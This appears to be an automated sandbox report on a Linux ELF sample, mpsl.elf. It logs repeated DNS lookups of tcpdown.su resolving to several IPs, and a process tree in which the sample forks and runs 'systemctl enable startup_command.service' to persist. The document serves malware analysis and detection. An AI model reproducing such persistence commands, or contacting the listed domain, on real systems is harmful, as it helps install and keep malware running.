Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.297297001 CET	1.1.1.1	192.168.2.13	0xa171	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.491684914 CET	1.1.1.1	192.168.2.13	0x9fb2	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.529294014 CET	1.1.1.1	192.168.2.13	0x9fb2	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.562469006 CET	1.1.1.1	192.168.2.13	0x9fb2	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.581551075 CET	1.1.1.1	192.168.2.13	0x9fb2	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:38.596405029 CET	1.1.1.1	192.168.2.13	0x9fb2	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.475193977 CET	1.1.1.1	192.168.2.13	0x7b76	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.485817909 CET	1.1.1.1	192.168.2.13	0xfdb	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.494653940 CET	1.1.1.1	192.168.2.13	0xfdb	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.508982897 CET	1.1.1.1	192.168.2.13	0xfdb	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.529908895 CET	1.1.1.1	192.168.2.13	0xfdb	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:40.539072037 CET	1.1.1.1	192.168.2.13	0xfdb	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.391825914 CET	1.1.1.1	192.168.2.13	0xf191	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.402287960 CET	1.1.1.1	192.168.2.13	0x58e1	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.411350965 CET	1.1.1.1	192.168.2.13	0x58e1	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.420355082 CET	1.1.1.1	192.168.2.13	0x58e1	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.436883926 CET	1.1.1.1	192.168.2.13	0x58e1	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:42.453128099 CET	1.1.1.1	192.168.2.13	0x58e1	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.309570074 CET	1.1.1.1	192.168.2.13	0x2fe8	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.323880911 CET	1.1.1.1	192.168.2.13	0x3aa0	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.332304955 CET	1.1.1.1	192.168.2.13	0x3aa0	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.350178003 CET	1.1.1.1	192.168.2.13	0x3aa0	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.369431019 CET	1.1.1.1	192.168.2.13	0x3aa0	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:44.388986111 CET	1.1.1.1	192.168.2.13	0x3aa0	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.251554966 CET	1.1.1.1	192.168.2.13	0x42f5	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.260752916 CET	1.1.1.1	192.168.2.13	0x93d7	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.268454075 CET	1.1.1.1	192.168.2.13	0x93d7	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.276242971 CET	1.1.1.1	192.168.2.13	0x93d7	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.283740997 CET	1.1.1.1	192.168.2.13	0x93d7	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:46.291398048 CET	1.1.1.1	192.168.2.13	0x93d7	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.191108942 CET	1.1.1.1	192.168.2.13	0x27b0	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.202320099 CET	1.1.1.1	192.168.2.13	0x8e4	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.220556974 CET	1.1.1.1	192.168.2.13	0x8e4	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.228368044 CET	1.1.1.1	192.168.2.13	0x8e4	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.236027956 CET	1.1.1.1	192.168.2.13	0x8e4	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:48.243966103 CET	1.1.1.1	192.168.2.13	0x8e4	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.812753916 CET	1.1.1.1	192.168.2.13	0xca71	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.820650101 CET	1.1.1.1	192.168.2.13	0x2d37	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.828130960 CET	1.1.1.1	192.168.2.13	0x2d37	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.835601091 CET	1.1.1.1	192.168.2.13	0x2d37	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.843921900 CET	1.1.1.1	192.168.2.13	0x2d37	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:49.859469891 CET	1.1.1.1	192.168.2.13	0x2d37	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.750874996 CET	1.1.1.1	192.168.2.13	0x6269	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.758481026 CET	1.1.1.1	192.168.2.13	0x5b77	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.777852058 CET	1.1.1.1	192.168.2.13	0x5b77	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.792006016 CET	1.1.1.1	192.168.2.13	0x5b77	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.800055027 CET	1.1.1.1	192.168.2.13	0x5b77	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:51.808662891 CET	1.1.1.1	192.168.2.13	0x5b77	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.353468895 CET	1.1.1.1	192.168.2.13	0x9e6e	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.361603975 CET	1.1.1.1	192.168.2.13	0x3fae	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.369473934 CET	1.1.1.1	192.168.2.13	0x3fae	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.388869047 CET	1.1.1.1	192.168.2.13	0x3fae	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.396502018 CET	1.1.1.1	192.168.2.13	0x3fae	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:53.404627085 CET	1.1.1.1	192.168.2.13	0x3fae	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.104242086 CET	1.1.1.1	192.168.2.13	0xbaf4	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.114089012 CET	1.1.1.1	192.168.2.13	0xc370	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.135445118 CET	1.1.1.1	192.168.2.13	0xc370	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.145930052 CET	1.1.1.1	192.168.2.13	0xc370	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.156394958 CET	1.1.1.1	192.168.2.13	0xc370	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:55.166430950 CET	1.1.1.1	192.168.2.13	0xc370	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.809972048 CET	1.1.1.1	192.168.2.13	0xfb1d	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.817677021 CET	1.1.1.1	192.168.2.13	0x83b6	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.825311899 CET	1.1.1.1	192.168.2.13	0x83b6	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.833046913 CET	1.1.1.1	192.168.2.13	0x83b6	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.840703964 CET	1.1.1.1	192.168.2.13	0x83b6	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:56.848447084 CET	1.1.1.1	192.168.2.13	0x83b6	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.533010960 CET	1.1.1.1	192.168.2.13	0x89ed	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.541791916 CET	1.1.1.1	192.168.2.13	0x4c3f	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.552382946 CET	1.1.1.1	192.168.2.13	0x4c3f	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.561439991 CET	1.1.1.1	192.168.2.13	0x4c3f	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.570235014 CET	1.1.1.1	192.168.2.13	0x4c3f	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:09:58.591775894 CET	1.1.1.1	192.168.2.13	0x4c3f	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.577289104 CET	1.1.1.1	192.168.2.13	0xfe02	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.624587059 CET	1.1.1.1	192.168.2.13	0x8b04	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.719167948 CET	1.1.1.1	192.168.2.13	0x8b04	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.759258986 CET	1.1.1.1	192.168.2.13	0x8b04	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.767234087 CET	1.1.1.1	192.168.2.13	0x8b04	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 01:10:00.786473036 CET	1.1.1.1	192.168.2.13	0x8b04	Name error (3)	tcpdown.suF	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mpsl.elf PID: 5502, Parent PID: 5428

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	/tmp/mpsl.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mpsl.elf PID: 5504, Parent PID: 5502

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mpsl.elf PID: 5506, Parent PID: 5504

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mpsl.elf PID: 5507, Parent PID: 5504

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mpsl.elf PID: 5512, Parent PID: 5507

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: mpsl.elf PID: 5510, Parent PID: 5504

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: sh PID: 5510, Parent PID: 5504

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5514, Parent PID: 5510

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5514, Parent PID: 5510

General

Start time (UTC):	00:09:33
Start date (UTC):	07/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: mpsl.elf PID: 5518, Parent PID: 5504

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/tmp/mpsl.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Chronological Activities

Analysis Process: sh PID: 5518, Parent PID: 5504

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable startup_command.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5520, Parent PID: 5518

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5520, Parent PID: 5518

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable startup_command.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5516, Parent PID: 5515

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5516, Parent PID: 5515

General

Start time (UTC):	00:09:34
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5524, Parent PID: 5523

General

Start time (UTC):	00:09:35
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

